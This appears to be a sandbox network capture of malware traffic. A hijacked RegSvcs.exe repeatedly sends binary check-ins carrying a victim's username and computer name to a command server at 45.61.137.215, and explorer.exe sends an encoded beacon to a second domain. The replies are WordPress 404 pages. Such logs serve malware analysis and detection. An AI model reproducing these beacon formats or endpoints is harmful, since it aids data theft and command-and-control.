                                            May 29, 2024 15:44:50.238791943 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:44:50.238804102 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:44:50.238811016 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:44:50.238940001 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:50.238945007 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:44:50.238961935 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:44:50.238965988 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            62192.168.2.94977734.132.146.171803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:48.471144915 CEST174OUTGET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.banditsolana.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            63192.168.2.94977845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:50.468523979 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:50.478200912 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:52.933528900 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:51 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:52.933543921 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:52.933554888 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:52.933563948 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:52.933574915 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:52.933583975 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:52.933593035 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:52.933602095 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:52.933617115 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:52.933626890 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            64192.168.2.94977945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:53.150602102 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:53.155736923 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:55.600224972 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:53 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:55.600243092 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:55.600260973 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:44:55.600271940 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:44:55.600281954 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:55.600295067 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:55.600316048 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:55.600325108 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:55.600337982 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:55.600348949 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            65192.168.2.94978045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:55.765644073 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:55.770611048 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:58.294079065 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:56 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
